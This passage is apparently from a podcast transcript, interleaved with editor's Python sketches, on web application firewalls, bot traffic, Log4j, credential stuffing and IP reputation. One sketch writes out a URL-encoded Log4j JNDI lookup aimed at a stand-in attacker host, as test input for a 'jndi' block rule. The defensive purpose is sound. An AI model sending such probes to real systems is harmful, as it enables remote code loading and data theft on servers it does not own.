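    '198.51.100.20 - - [01/Oct/2024:10:00:03 +0000] "GET /pricing HTTP/1.1" 200 900',
]

for ip, hits, share in top_ips(sample):
    print(f"{ip}\t{hits}\t{share:.0%}")
```

On real traffic you would stream the log file instead of holding lines in a list, but the grouping idea is the same.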
Starting point is 00:33:59 And so people do this. They take their logs and they ship off all their logs to like some massive Elasticsearch cluster. Then they write like these complex queries to dig through it. And they're like, okay, we found out last week that there's these many IPs. And like, why is one IP address, like 90% of our traffic, like that kind of stuff happens. So we have a visualizer that tries to make sense of all that stuff. And then you can one click block it. You can also like, you know, try to do some programmatic things, but that's a lot of it. And the other things are,
Starting point is 00:34:29 there's a lot of configuration stuff. So you can block countries, you know, which is very useful just to reduce your surface area. We had someone who had to block Canada and there's no like real thing with Canada. It was just like there were proxy servers in Canada that people were using to attack their site. We often find that's the case. Um, yeah. So things like that, like very, very practical sort of stuff. So. Yep. How sophisticated are, I guess, the bad actors? Is it pretty sophisticated stuff or what's that look like? It really depends. I mean, for sure there's stupid bots out there that do like /wp-admin to every Rails site and every, just, you know. I've seen those for sure. Yeah. Yeah, for sure. Well, and that's because there's a lot of that out there. But those bots, they still, there's enough intelligence to them, because they're trying to be efficient. Like imagine you were writing a malicious bot, like
Starting point is 00:35:22 well i'll check for the most common thing, but whatever the headers come back with, then I can do a follow-up too. Oh, interesting. Yeah. Okay. So I see a lot of that and we see a lot of those IP addresses that are making those things act as reconnaissance where there's, you know, this is, this sounds like I'm making it up like a Cold War thing, but really Eastern Europe has a lot of data centers that they're like, yep, sign up for us. We're cool with spam and malware. And they change IP addresses.
Starting point is 00:35:55 But if you see a bot, if you get hit with that WP admin thing, you know like, oh, well, this IP address is making this request. That's bad. So we're going to block it. And so then the next thing that it comes out with, you can block that as well. So yeah. Yeah. Okay, that's pretty interesting. Um, just to kind of close the loop, I guess like Wafris, you have some sort of centralized thing somewhere where people actually tweak their rules and all sorts of stuff. Yeah. Um, I guess like tell me a little bit about your architecture there. I imagine you're not using SQLite as your database
Starting point is 00:36:26 for your centralized thing. What are you using there? Well, that looks much more like a normal Rails app or whatever. And hub.wafris.org, you can sign up for a free account and go in. And if you're on Rails, you automatically get the V2. And so if you have the gem installed, it really just looks for an API key. It functions very similarly to like exception monitoring services.
Starting point is 00:36:49 So like Sentry or any of those, like you set up a key and it sort of handles things. Yeah, and it would just work. You can go in, see like, oh, most of our requests are from, you know, Buenos Aires. We don't do any business there.
Starting point is 00:37:03 That's sure weird. So we're going to block that, you know. Yep. Yep. For that visualizer aspect, which we're talking about a fairly high amount of data, sort of analytical queries, very ad hoc and interactive for users. I guess, like, what are you using for that? Has that been a hard problem technologically to solve? We're using Redis.
Starting point is 00:37:22 Oh, wow. Okay. We're using Redis on the server. So, okay. So is that like pre-aggregated and like you're just sort of aggregating in different ways. So there's like some flexibility
Starting point is 00:37:31 on how you slice and dice, but not like sort of unlimited SQL querying capabilities. Well, at the end of the day, these are log files, you know, so there's only so many ways to chop them up. And there's only so much data
Starting point is 00:37:44 we're actually taking in. So, you know, grouping on, 'cause these are, this is weird. Most people, I don't think have ever seen a list of like, here's your top 10 IP addresses that have made requests to your site in the last week. Like, yeah, that's not a crazy thing to ask for. That would be very useful, but that is a hard thing to get out of most of these systems. And this is kind of what I was going back to. Part of our larger goal is just to raise the default, like the default level of security we as application developers have with our applications. More control, more security, because there's this horrible asymmetry to this where it's so easy to write
Starting point is 00:38:26 a bot. And like, we do this in my talks, like, hey, you want to write a bot? And it's basically just a curl script. You just write curl and then you wrap it in a little bit of bash and you just give it a list of domains and it just goes out and hits all those domains looking for like, oh, did you leave your .env file in the root? Like, you might not, but one of the 5,000 people we're looking at today did. So, you know, yeah, all that kind of stuff. So. Yep, for sure. Um, what about, you know, there's a new vulnerability that came out, I think yesterday, CUPS or whatever, that had like this 9.9 out of 10 score, or like Heartbleed. How quickly between like those vulnerabilities being released,
Starting point is 00:39:06 do you start to see bots trying to exploit that? Is that like immediate? Like, is that within a day? Oh yeah. Yeah. Um, so Heartbleed was an SSL vulnerability.
Starting point is 00:39:17 So you had to update your TLS libraries and things. Um, I think a better one is Log4j. I don't know if you're familiar with that one. Yeah, sure. Yeah. So Log4j was really bad for people that aren't aware of it.
Starting point is 00:39:30 Log4j exploited a Java logging service. And basically, you could very easily write in commands that would then be executed by that service. So you could write in like, hey, post out all the data from the log files to this external server. And you could actually go in. So like, so I'm running a Rails server. I'm serving up my images out of it. I could go in and like go to logo.png and then put in the parameter question mark and then put my Log4j command in there. My Rails app doesn't actually do anything, but I'm using a service that ships
Starting point is 00:40:05 this off to, you know, some other thing that does use Log4j. That service then pulls out all the logs and sends it off. So yeah. So that stuff happened almost immediately and it was a huge, it was a huge scramble, but you know, for Expedited, which is the enterprise service, we, that day, you know, started patching for everyone. And everyone was just covered. And that's a very managed service. You know, with Wafris, you can do something very similar. We help with that. You can go in, like, the immediate response is, like, the protocol for Log4j was, like, JNDI.
Starting point is 00:40:44 So if you went in and just block, that's an unusual string. Like you block any path that has JNDI in it. That's not everything, but that's like, again, you're cutting down the surface area of attack. You're cutting down like the probes, figuring out that. Oh yeah. Like, yeah, it's easy to get to this, you know, site. So, yeah.
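Editor's sketch: the "block any path that has JNDI in it" rule described above could look roughly like the following. This is an illustration, not Wafris's or Expedited WAF's actual rule engine; `should_block` and `BLOCKED_SUBSTRINGS` are hypothetical names. It URL-decodes the path and query first, since probes are often percent-encoded, and compares case-insensitively. As Mike says, this is not everything: obfuscated payloads that never spell out the string literally would slip past a plain substring check.

```python
from urllib.parse import unquote

# Hypothetical rule list: unusual strings that should never appear in
# a legitimate request path or query string for this application.
BLOCKED_SUBSTRINGS = ("jndi",)


def should_block(raw_path_and_query: str) -> bool:
    """Return True if the decoded request target contains a blocked string."""
    decoded = unquote(raw_path_and_query).lower()
    return any(needle in decoded for needle in BLOCKED_SUBSTRINGS)


# A static asset request with a lookup string smuggled into a parameter,
# similar to the logo.png example in the conversation.
probe = "/logo.png?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D"
print(should_block(probe))
print(should_block("/logo.png"))
```

The point of a rule like this is to cut down the probing surface quickly while the real fix, patching the vulnerable library, is rolled out.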
Starting point is 00:41:00 Yeah. One thing you were talking about before we started here is just like how security and developers, how they think about it. Hey, they, they, they learn this stuff within their application framework, but sort of once it goes over that boundary, it's just like, they don't have a sense of it or something like that. Could you, could you dive into that a little bit and what you see or like where devs could? I think it's a misnomer that developers don't care about security. Like I hear that a lot from security teams, which is the security team being frustrated that like, hey, I'm trying to get these developers to fix this thing. And they're coming back that like, is that really an exploit? I tried to do this thing. It's not fun stuff to work on. And I think their takeaway is that developers don't care about this. I think developers care a lot about the security because I think they're conscientious.
Starting point is 00:41:48 And part of making good software is making software that doesn't harm your users actively. And I talked to a lot of developers. I think it's mostly about tools, that we haven't given developers good tooling for this kind of stuff. And what I was really trying to get to was, you know, within the framework, like Rails or Laravel, if you use the proper form stuff, you're very resistant to like cross-site scripting attacks because there's a lot of stuff in there. But you do have issues of, well, what do you do if like you're running an e-commerce site and you're just being scraped? Your whole site is just being scraped every item.
Starting point is 00:42:27 And then your competitor is just going through and marking all their items 10% lower, cheaper than yours. And underbidding you. Like that's, that's not exactly, that's not a SQL injection that you're trying to deal with. Like that's an operational issue. Or the big attack we see, like the number one, like serious attack we see against SaaS apps by far is credential stuffing, which is that you just put in a username and password and you try like over and over again with different ones. And typically we see those attacks so large that they accidentally DDoS the site. And so a very common response to that is, okay, well, let's put in rate limiting. And so you put in rate limiting and you say like, well,
Starting point is 00:43:11 no more than like five attempts an hour. And you're like, that sounds very reasonable, except that the attackers for a couple bucks are buying thousands of these proxy servers. And so they have all these different IP addresses. So they have a thousand IP addresses. Well, that's 5,000 attempts an hour. That doesn't really solve the problem. That's still quite a bit. So, you know, you need these other techniques to then say like, well, we can block these proxy servers because we know these IP addresses have been used in bad ways. That's good. Block these from another country, block them on user agent, all sorts of things. So, and then that's how you deal with those attacks along with rate limiting.
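Editor's sketch: the arithmetic above (1,000 proxy IPs × 5 attempts per hour = 5,000 attempts per hour) is why a per-IP rate limit alone falls short against credential stuffing. The following is a minimal illustration of layering block lists in front of a per-IP limit; it is not Wafris's implementation, and the class name `LoginGuard`, its parameters, and the limits are assumptions chosen to match the numbers in the conversation.

```python
import time
from collections import defaultdict, deque

MAX_ATTEMPTS = 5        # per IP, per window (the "five attempts an hour" example)
WINDOW_SECONDS = 3600


class LoginGuard:
    """Hypothetical login filter: block lists first, then a per-IP rate limit."""

    def __init__(self, blocked_ips=(), blocked_countries=(), blocked_agents=()):
        self.blocked_ips = set(blocked_ips)
        self.blocked_countries = set(blocked_countries)
        self.blocked_agents = tuple(a.lower() for a in blocked_agents)
        self.attempts = defaultdict(deque)  # ip -> timestamps of recent attempts

    def allow(self, ip, country, user_agent, now=None):
        now = time.time() if now is None else now
        # Cheap reputation checks first: known-bad proxies, countries, agents.
        if ip in self.blocked_ips or country in self.blocked_countries:
            return False
        if any(a in user_agent.lower() for a in self.blocked_agents):
            return False
        # Sliding-window rate limit per IP.
        window = self.attempts[ip]
        while window and now - window[0] >= WINDOW_SECONDS:
            window.popleft()
        if len(window) >= MAX_ATTEMPTS:
            return False
        window.append(now)
        return True


# With rate limiting alone, 1,000 proxy IPs still get this many tries per hour:
print(1000 * MAX_ATTEMPTS)
```

A caller would consult `guard.allow(ip, country, user_agent)` before processing a login attempt; the block lists are what shrink the pool of usable proxy addresses.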
Starting point is 00:43:52 Yep. Yep. Gotcha. Is there a lot of just like working with Wafris and Expedited WAF, just like education you've had to do for customers and things like that? Do you feel like that's like a big part of your job? Yes and no. I mean, certainly the customers that are like mandated to get a web application firewall less so because they're just like desperate for stuff. But I think the education,
Starting point is 00:44:15 the best analogy is a toolbox. That's all this is. It's not magic. It doesn't do some super secure thing. It just gives you the ability to like, when there is an issue, actually take care of it in a reasonable way. In a way, like I, I, I have had multiple calls with people like two in the morning, their time, they've been up for 24 hours. Their site has been down that whole time. And they're just desperate. They're like, and that's not a good time to be like, well, which of these different enterprise framework options should we choose? Like, it's just hard. So again, and this is Wafris is our reaction to all these problems. It's like, it's open source. It's, you know, in Rails, it's just a gem. It's a library. You install it. It's there. If you need it,
Starting point is 00:45:03 you can check your traffic. You can, you know, see where this stuff happens. So, yeah. Yeah. Yeah. I want to talk about Rails a little bit because I have never written any Rails, but I like to do just sort of like vibe checks of where we're at. And it's hard to tell on Twitter because there's so much stuff. But it seems like there's a bit of a shift back towards like full stack frameworks and some of that stuff. And like, hey, some of the craziness of full-stack JavaScript,
Starting point is 00:45:27 like was, was not worth it. And actually it's nice to have some of this stuff, I guess, like what have you seen in the, in the Rails or, or like, you know,
Starting point is 00:45:34 where about like different, different full-stack frameworks that you provide for, are you seeing, I guess, vibe shifts there or what's that feel like the last couple of years? It's hard to tell. I mean, honestly,
Starting point is 00:45:45 well, and I think there is just so much application development that's happening. It's hard to tell. I do see a lot of very split applications and we have a lot, probably 35, 40% of the applications we protect with Expedited are essentially like api.domain.com. And they have a front end app.
Starting point is 00:46:04 Maybe it's on Vercel and Netlify or whatever, and then the back end is on Heroku, and that's, you know, doing all the heavy lifting back end work. And still choosing, you know, it's this right tool for the right job, you know, kind of stuff. Yep, for sure. Y'all had a good post on adding in Jumpstart Pro. And I'm not familiar. I've heard of this a little bit. And I just want to understand a little bit. So as I understand, you had Wafris as a Rails application. It was sort of like MVP or just like at least that early version of it.
Starting point is 00:46:37 And then Jumpstart Pro is like this sort of, I don't want to say template, but like a toolkit that has like a lot of sort of opinionated rails, a starter kit. There you go. And so you like bolted that on after the fact. I guess like, tell me a little bit about like why, why you decided to do that, how that, how that went and what that was like. Sure. So there's really two sides of it. One small team trying to be very efficient and starter kits are a good way to do that. It is the case that, you know, there's a lot of things out of the box. You don't want to have to write from scratch, like for every single project,
Starting point is 00:47:13 interacting with Stripe, you know, doing all that stuff, managing plans. And so, so why do it? The other thing, and this may be unique to us, but I think, you know, speaks a little bit to like the overlap of the marketing and development stuff is that I think SaaS starter kits are a distribution channel for Wafris. And that's part of the reason we're strategically open source is that, you know, Jumpstart is a very popular starter kit. They include Wafris in it. So, you know, so people just get it out of the box. Um, another one is Bullet Train. Yeah, I've heard of Bullet Train. Yeah. Okay. Uh, they were acquired by
Starting point is 00:47:55 ClickFunnels. Um, so Andrew Culver's starter kit. And, you know, we're included in there. We're included in some other ones. And that's just a distribution channel for us. Uh, and so, you know, it makes sense to be familiar and use the things that, you know, also promote us. So. Yeah. Yeah. Tell me a little bit about, you know, your background both as a developer and marketing. I just, like, how do you think about marketing to developers? What's effective for that? Well, I think it is a challenge. Uh, you know, a real challenge we have with Wafris is that there's not, it's not often very legible, like who is really in need of this. Like I laid out the scenarios and those are real scenarios. And something I feel very happy about is that,
Starting point is 00:48:41 you know, especially doing the security work is this is very positive work. It's very positive for developers, very positive for these sites. It's not something that, you know, feels scummy in any way. And yeah, so I think I lost the thread of the question. Marketing to developers. And so I think part of this is, so it's hard to target those people other than like very broad things. So this article was an attempt, um, to reach more developers by just sharing like what we're going through and our expertise and like our particular bit of this. Um, it was on Hacker News. It was on a lot of the big, the major like subreddits for programming and SQLite and stuff on Reddit, uh, and lots of, lots of shared, you know, things. So do a lot of that. And then I try to do a lot of, uh, engineering as marketing. I have a different site, For A Good
Starting point is 00:49:36 Strftime, which just helps you format date time strings. Um, so that's been around for a long time and it actually drives quite a bit of traffic to the Wafris site. We have a link at the bottom of it. And I had originally made that for a meetup for a talk, just like, Oh, here's how easy and quick it is to make something. And again, one of those things that it's just been very useful to people. So trying to be useful, trying to be helpful, make things, I think are all directionally positive ways of doing marketing. So. Yep. Yep. I love that, like, sharing knowledge stuff, you know, like just nerd sniping people like you did with this thing where it's like, oh wow, going from Redis to SQLite and
Starting point is 00:50:15 getting faster, I think that like at least piques people's interest and getting a sense of that. And then, yeah, that For A Good Strftime, we'll include that. But it reminds me of Auth0 had JWT.io. And I think a lot of people just use that for different things. And I think just like, yeah, like you're saying, having just helpful tools and then sharing your tool as part of it. So a tool we have for Wafris is IP lookup that you can go to the site, no sign up or anything, and put an IP address in. And it will do a lookup of it of all the sort of different reputational information. And having used a lot of these services, I think ours is a lot better. Like we do some other things to try to give more context to
Starting point is 00:50:57 it. Like we look up actually not just the IP address that's put in, but all the IP addresses around it. Cause oftentimes that indicates like, Oh, this is actually in one of those bot farms. Cause everything in it is well known to all these block lists. You can actually launch like a probe of that IP address from the website to see if it has active like VPN and proxy stuff happening on it. So, and that's, that's again, it's a free tool. We get a lot of signups from that just because again, it's useful just out there. So.
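Editor's sketch: the idea of looking at "all the IP addresses around" the one being checked can be illustrated with Python's standard `ipaddress` module. This is a guess at the general technique, not a description of how the Wafris IP lookup works; the function name `neighbor_block_ratio`, the choice of a /24 neighborhood, and the toy block list are all assumptions. It handles IPv4 only.

```python
import ipaddress


def neighbor_block_ratio(ip: str, blocklist: set, prefix: int = 24) -> float:
    """Fraction of the other hosts in the surrounding network that are block-listed.

    Assumption: a /24 around the address is a reasonable "neighborhood".
    """
    network = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
    neighbors = [str(host) for host in network.hosts() if str(host) != ip]
    flagged = sum(1 for host in neighbors if host in blocklist)
    return flagged / len(neighbors)


# Toy block list: the first 100 hosts of a documentation-only range.
toy_blocklist = {f"203.0.113.{i}" for i in range(1, 101)}

# The queried address is not listed itself, but many of its neighbors are,
# which hints that it may sit inside a bot farm.
ratio = neighbor_block_ratio("203.0.113.200", toy_blocklist)
print(f"{ratio:.0%} of neighboring addresses are block-listed")
```

A high ratio for an address that is not itself listed is the kind of extra context a single-address lookup would miss.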
Starting point is 00:51:29 Yep. Where do you like that IP reputation stuff? Is that something that you like buy from some other service provider? Are you calculating, like, do you see enough traffic that you calculate it yourself? Or like, what's that sort of look like? All the above. I mean, and that's really, because I don't want to get you to give away your secret sauce or anything here if that's. Yeah, but well, it's it's a Google away. So it's not it's not that secret. Certainly, you can go out and license this data. I think the real part where expertise comes in is that some of these lists are more reliable than others.
Starting point is 00:52:00 And what you don't want to do is block people unnecessarily. So we've learned through hard experience sort of how to filter out this giant list of noise and things. So, yeah. Yeah, yeah, very cool. Mike, thanks for coming on the show. This has been great. Like, again, I love your post and it's been great learning about Wafris
Starting point is 00:52:18 and all these different things. If people want to find out more about you, about Wafris, where should they go? I'm still on Twitter. Still reluctant to say that, but, you know, I'm still on Twitter mostly because a lot of muted words. I'm still on Twitter at mbuckbee. And I am on LinkedIn, but who uses that? And, yeah, you can go to wafris.org.
Starting point is 00:52:45 Check it out. Yeah. Cool. Mike Buckbee, author of Re-Architecting, Redis to SQLite. One of my favorite posts of the year. Thanks for coming on. Awesome.
Starting point is 00:52:54 Well, thanks so much, Alex. This has been a delight. Yeah, great.
